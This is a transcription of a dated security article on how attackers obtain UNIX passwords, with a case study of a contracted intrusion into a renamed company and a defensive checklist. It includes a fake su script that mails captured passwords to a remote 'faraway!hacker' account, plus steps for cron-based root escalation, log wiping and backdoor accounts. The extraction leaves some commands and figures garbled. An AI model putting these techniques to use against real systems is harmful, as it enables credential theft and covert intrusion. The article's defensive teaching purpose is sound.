Password Hacking Stephen James Payoff

Transcription

1 Password Hacking Stephen James Payoff Hackers have developed numerous techniques over the years for guessing or obtaining passwords and breaking into systems. This article discusses the methods that hackers use to gain access to a system and it includes a case study of one hacker's successful intrusion into a corporate computer system. A list of steps for management and system adminstrators to take to establish a more secure system is also provided. Introduction The first challenge that a hacker faces is to obtain or to guess a valid User ID and password combination for a targeted system. Once these pieces of information are obtained, the hacker can gain access to the corporate system and can attempt to extend his or her current level of access. It is vital to understand and appreciate the importance of proper password control. A system with inadequate password controls is an invitation for hackers to gain access. Hackers have developed numerous techniques over the years for guessing or obtaining passwords. Many automated techniques have been developed to expedite the process and are readily available on the Internet. This article discusses the methods that hackers use to gain access to a system and it includes a case study of one hacker's successful intrusion into a computer system. Methods of Access Hackers are resourceful, and they have devised numerous ways by which to gain illegal access to a system. Brute Force Attacks Regardless of the reasons behind an attack, the primary target of a hacker is the /etc/passwd file. UNIX systems inherently require that the /etc/passwd file be world readable. This feature allows any user with access to the command line to copy the password file. Once a hacker gets hold of this file, he or she has a list of valid user accounts. Then it is easy to create a program to guess passwords; a simple one can be written in approximately 60 lines of C code or 40 lines of PERL. Many password guessing programs are freely available on the Internet. Alternatively, a hacker could sit at a terminal and manually attempt to guess passwords. Password Crackers If the targeted site has not installed a shadow password file (that is, if the encrypted passwords are stored in the /etc/passwdfile itself), a hacker's job is already halfway complete. The hacker has access not only to a list of valid user accounts but also to a list of corresponding passwords. He or she could simply run a password-cracking program such as Crack. Crack works by encrypting a standard dictionary using crypt, the encryption algorithm used by UNIX systems. It then compares each encrypted dictionary word against the entries in the password file until it finds a match. Crack is freely available through an anonymous File Transfer Protocol (FTP) from FTP.CERT.ORGat /pub/tools/crack.

2 Keystroke Logging It takes less than 30 seconds to type in a short script to capture sign-on sessions. A hacker can install the program onto a workstation with a disk. It works in the background and captures every sign-on session, based on trigger key words. The hacker can then remotely read the captured keystrokes and gain access to the system. This technique is extremely simple and almost always goes unnoticed. An example of a simple program that captures switch-user (su) sign-on sessions and transmits the captured data to a user called hacker on a remote system called faraway is as follows: stty -echo echo Password: \c read X echo stty echo echo $1 $X sendmail faraway!hacker & sleep 1 echo Sorry rm su This program will write Sorry to the user's screen after the user enters his or her password. The user will probably assume that he or she has mistyped the password and will attempt to sign on again. Packet Sniffing The Internet offers a range of network monitoring tools including network analyzers and packet sniffers. These work by capturing packets of data as they are transmitted along a communications segment. A hacker needs only to gain physical access to a Personal Computer (PC) connected to a Local Area Network (LAN) and load this software. Alternatively, the hacker could attach a laptop to a network port in a remote corner of the office and start capturing data packets. Knowing that network traffic is almost never encrypted, the hacker stands a good chance that he or she will capture valid user account and password combinations, especially between 8:00 a.m. and 9:00 a.m. Tcpdump, an effective tool for UNIX systems, is used to monitor network traffic and is freely available through an anonymous FTP from FTP.EE.LBL.GOV at tcpdump2.2.1.tar.z. Social Engineering A hacker identifies a user account that has not been used for a certain period of time (such as two weeks). He or she ensures that it belongs to a user that the administrator is not likely to know by voice. Accounts belonging to interstate users or users in another building are often targeted for this reason. Once the hacker has chosen a target, he or she assumes the user's identity and calls the administrator or the help desk, explaining that he or she has forgotten the password to the account. The hacker requests that the password be reset and the administrator or help desk obliges, giving the hacker the new password over the phone. The policies in many companies enable this method to be highly effective. Default Passwords Most UNIX software comes out of the box with standard system user accounts each with a default password already defined within /etc/passwd. Examples of system accounts

3 include adm, sys, llp, or mail. Very often, UNIX systems come with a default guest account as well. It is common knowledge that the default password for this account is usually guest. Hackers have huge hit lists of these default passwords for almost every type of operating system and for most commercial application packages as well. To speed up the break-in, they often include these hit lists as part of their password guessing programs. Security Measures Knowing how hackers gain access enables system administrators to create barriers against intrusion. By developing and strictly following specific procedures, companies can put up a strong defense. Password Length and Construct Rules The system should force users to select passwords that are at least five characters in length, consisting of a mix of alphabetic, numeric, and special characters. Most systems have the ability to enforce password length and construct rules. It is incumbent upon the administrator to define these parameters correctly. Passwords that are Difficult to Guess Where possible, the system should be configured to prevent users from selecting passwords that are easy to guess. That is, it should force users to select passwords that would withstand a brute force or crack attack. Examples of passwords that are easy to guess include words from a dictionary or other values (such as names) that are easily attributable to a user. A number of programs are available on the Internet that can assist administrators in ensuring that users select passwords that will withstand a hacker attack. These include programs such as npasswd and passwd+, which check user passwords employing the following criteria: A minimum number of characters. Elimination of trivial passwords such as aaaa. Use of mixed case. Nonoccurrence in a dictionary. Nonuse of personal information. The password is compared against the user's account name, the host name, the user's first and last names, and against various information about the user returned by the finger command. Permutations of this information(such as backward spelling) are also checked. The npasswd program is available through an anonymous FTP from ftp.cc.utexas.edu in the compressed tar file /pub/npasswd/npasswd.tar.z. Invalid Sign-on Attempts The administrator should ensure that the system locks out the user account after a predefined number of invalid sign-on attempts. Many secure sites configure their systems so that the account is locked out after three failed log-on attempts and remains locked until

4 the administrator resets it. This standard helps guard against a manual or automated brute force attack, as the hacker is given only three chances to guess the correct password. Invalid sign-on attempts should also be logged and regularly followed up. A series of failed log-on attempts may suggest that a hacker is attempting a brute force attack. The administrator can then take preventive measures to guard against such an attack. Password Expiration The system should be configured so that users are forced to change their passwords at regular intervals throughout the year. Some systems enforce this by expiring user passwords at predeined intervals, allowing users a grace period (such as five days or logons) to change their passwords before their accounts become locked. Security Policy and User Education One of the most important controls that the administrator can implement is a formal and enforced data security policy. At a minimum, the documented policy should include statements on: The value of information and software to the organization. The extent and reliance placed by the organization on the continued integrity and availability of its information and system resources. The responsibility and accountability of individual users. Management requirements with respect to security administration. The system administrator's day-to-day functions. Password management controls. Restart and recovery procedures. Review of system logs and audit trails. Program change procedures and guidelines. Copyright enforcement policies. Virus detection and prevention procedures. Senior management's endorsement of the policies and procedures. The security policy should be enforced by means of regular user security awareness seminars and circulated memoranda. A Hacker's Confession The best way to safeguard a system is to understand the methods a professional hacker uses. The following is a case study of a real system penetration. It is an account of an actual assignment in which an individual was contracted to hack into a major Australian organization's computer system during December It outlines the techniques the

5 hacker used to penetrate the system successfully. System administrators can use this information to ensure that their own systems cannot be compromised in the same way. For the purposes of the case study, the organization has been renamed PRIDE Corporation. All names and identification (such as user IDs, passwords, and modem numbers) have been changed so that they do not represent the real organization. December 3, 23:17 The hacker is at home. He has spent the last hour surfing the Internet looking through the alt.2600 newsgroup. He has just found a short daemon dialer program that someone has posted on the bulletin board. Having downloaded and scanned it, he starts examining it. (It is good practice to scan all software downloaded from the Internet in case it has been infected by a virus.) After a bit of experimentation, he decides to use it to find modem numbers for the PRIDE Corporation. He looks in the telephone book and determines that the telephone number for PRIDE is prefixed 358-XXXX. Assuming that the company also uses that prefix for their modem numbers, he sets the daemon dialer to ring all numbers in the range to December 4, 07:38 The daemon dialer finishes its task in about six hours. It writes an output file in which it has logged all the modem tones it detected in the given range. All the hacker has to do now is to dial these modem numbers to determine whether any of them belong to the PRIDE Corporation. Some daemon dialers will automatically dial the numbers; this particular version requires the hacker to do this task manually. The hacker tries the first one. It rings and connects right away, indicating that the system does not have a call-back function. It does not attempt to confirm the user's identity by asking for a modem password. The hacker knows he has dialed the PRIDE Corporation as soon as the sign-on screen appears: Welcome to the PRIDE Corporation login: December 4, 09:20 The hacker has accomplished the first step of his hack: he has gained access to the signon screen. It is as though he has physical access to a terminal within the PRIDE building, except that he can commit the crime in the privacy of his own home and at his leisure. The next step is to penetrate the system. He decides on a brute force attack. He attempts the well-known default system accounts such as rootand guest and tries entering the account names as passwords. This approach is unsuccessful, because the administrator has apparently changed the default passwords. Given that he does not know any legitimate user IDs, the hacker decides to try a little social engineering. He calls the PRIDE Corporation's switchboard and explains that he is typing a letter to the system administrator, but he needs to make sure that he is addressing it to the correct person. Certainly, sir. The system administrator is Steve Smith, the operator tells him. He now has concrete information to fuel his attack. Over the next several hours, he tries a variety of user ID and password combinations such as: smith/smith; steve/steve; smiths/smiths; smiths/pride; smiths/pride1; and ssmith/steve.

6 December 4, 11:15 The hacker finds the right combination: smiths/dec95.it appears that the system at PRIDE forces users to change their passwords every month and Steve Smith, the administrator, uses a password in the format mmmyy. The hacker knows that this piece of information will be useful if he has to guess the administrator's password again in another month. Less than four hours have passed since the hacker started and he has already found the company's modem numbers, the administrator's name, and a valid user ID and password combination. All he has to do now is sign on and see what he can do. He signs on as Steve Smith and is granted access to the command line. He takes a quick tour of the file system to see if he can find anything of interest. The first place he visits is the /etc directory to determine whether PRIDE has a shadow password file. The hacker does a quick list of the directory and is pleased to see that there is no password shadowing. Password shadowing is a feature of C2 level security where encrypted passwords are kept in a separate file to which only the root user has access. The hacker takes a look at the /etc/passwd file and notices a couple of accounts with blank values in the password field. Even though their shell is restricted to a menu, he takes note of these accounts so that he can use them to sign on later. (See Exhibit 1.) An Extract of the /etc/passwd File root:5tyhgh6dsf,2.z9:0:0::/: daemon:*:1:2::/tmp: uucp:hgyu74fds5b.9:3::/usr/spool/uucppublic:/usr/lib/uucp smiths:nbh7hg3gft,2.z9:10:12:steve Smith:/u/smiths:/bin/sh pastelc:jh7jhgbf90,2.z9:11:12:cindy Pastel:/u/pastelc:/bin/sh rhodeg::12:15:guy Rhodes:/u/rhodeg:/bin/accmenu fitzz::13:15:zane Fitzpatrick:/u/fitzz:/bin/accmenu December 4, 11:52 Now that the hacker has penetrated the PRIDE system, he wants to extend his levels of access to superuser. To do this, he has to obtain the root password. The root account is the most powerful user within UNIX and has unrestricted access to all files within the system. If he can crack this account, he can do anything to PRIDE's computer resources. The hacker signs in again as Steve Smith and decides to search through the file system for all set user ID (SUID) root files. Files that have been assigned SUID root privileges effectively possess root(superuser) rights whenever they are executed. Anyone who gains access to a SUID root file can modify the file so that it executes a potentially destructive root command. The hacker enters the following command: find /-user root -perm print. This action comes back with a list of five different files. The hacker then performs a list of each of the SUID files to determine whether they were writeable. He discovers that they are writeable only by root. Next he tries a different tactic. He looks through the system to find the root cron table. Cron is a UNIX feature that automates job scheduling. Jobs scheduled within the root cron table are executed with root privileges. Once the hacker finds it, he performs a list of each executable file within the cron table. To his surprise, one of the scheduled jobs has a file access mode enabling Steve Smith to write to the file. He immediately edits the file and inserts the line: /bin/sh -i. By looking at the parameters defined within the cron table, the hacker knows that the file is scheduled to run at 21:00 every night and that the next time it runs, it will execute his line of script, enabling him to gain superuser access.

7 December 4, 21:10 He signs on as Steve Smith and is presented with the root sign-on prompt. His trick has worked: he now has total control of the system. His first step is to eliminate all the audit trails. He quickly reviews and modifies the accounting files and removes his entry from the root crontab file. The hacker then removes all traces of his failed switch user (su) attempts from the /usr/adm/sulog. As root, the hacker has full access to the /etc/passwdfile, so he decides to create a backdoor entry for future use. He creates an account called johnb and assigns it a user ID number of zero (superuser). He hides it among the hundreds of other accounts so that it will not be easily discovered. The hacker then creates a number of entries in the /etc/hosts.equiv file and root's.rhost file. This tactic will enable him to sign on to (and from) other systems as root without having to enter a password. At this stage, he could completely erase the entire file system or add a virus or Trojan horse. (A virus is a program that potentially destroys or corrupts program and data files). Instead, the hacker decides to add a sniffer routine to the system log-on scripts. Sniffer software captures system users' sign-on sessions and, depending on the sophistication of the program, transmits the captured data to a remote system. In about 40 lines of C, he writes a routine that captures users' passwords whenever they sign on. This action will enable him to identify and use other users' passwords at any time in the future in case his root access is detected and revoked. Alternatively, he can run software, such as Crack, against the password file or create additional accounts (such as the johnbaccount) for future use. Status Check It had taken less than 24 hours for the hacker to gain root access to the PRIDE computer system. It had not required any particularly technical skills. It is often the more simple oversights, such as those previously discussed in the case study, that enable hackers to penetrate systems. To provide a reasonable level of system security, company management should institute basic system controls, such as the following, at a minimum: Perform regular system security reviews to identify control weaknesses that may enable unauthorized persons to gain access to computer resources. Develop a documented data security policy that is sponsored and supported by senior management and enforced through effective system administration techniques. Employ a competent and security-aware systems administrator. Ensure that employees are made security-aware through formal and ongoing education. Ensure that all accounts on the operating and application systems have passwords that are regularly changed. Revoke entries for unused accounts from password files. Force users to select passwords that are difficult to guess. Run software, such as Crack, to identify and change weak passwords before a hacker does.

8 Change all vendor default passwords when software is installed. Consider one-time passwords for access from external networks and for access to sensitive resources. This precaution helps overcome sniffer software risks. Ensure that accounts are locked out after a prescribed number of sign-on failures. Institute a procedure in which sign-on failures are logged, reviewed, and followed up. Restrict retrieval of the password file so it may not be accessed through Trivial File Transfer Protocol. Confirm that the network configuration files (such as /etc/hosts.equiv, /etc/hosts.lpd and /*/rhosts files) do not contain a + (plus sign). Ensure that appropriate file permissions have been set throughout the entire file system. Do not create or allow SUID shell scripts, particularly SUID root. If the network is connected to other less secure networks, consider installing a firewall. Care must be taken to configure each firewall component properly, including route, gateway machines, and communication protocols. Keep all system components (i.e., computers, communications equipment, backup media, and security-sensitive hardcopy output) in a physically secure environment. Keep up to date with all Computer Emergency Response Team (Computer Emergency Response Team) advisories and patches. Conclusion Password security is one of the most critical controls that can be implemented within a systems environment to protect corporate information and computer resources. The Internet offers a wide range of tools that can assist the administrator in enforcing adequate password controls. Passwords provide a line of security against computer hacker attacks; the stronger the password procedures, the stronger the defense against a hacker attack. Author Biographies Stephen James Stephen James is one of Australia's computer security lead experts who specializes in UNIX and Internet security as well as hacker studies. He is a senior consultant with Price Waterhouse (Sydney).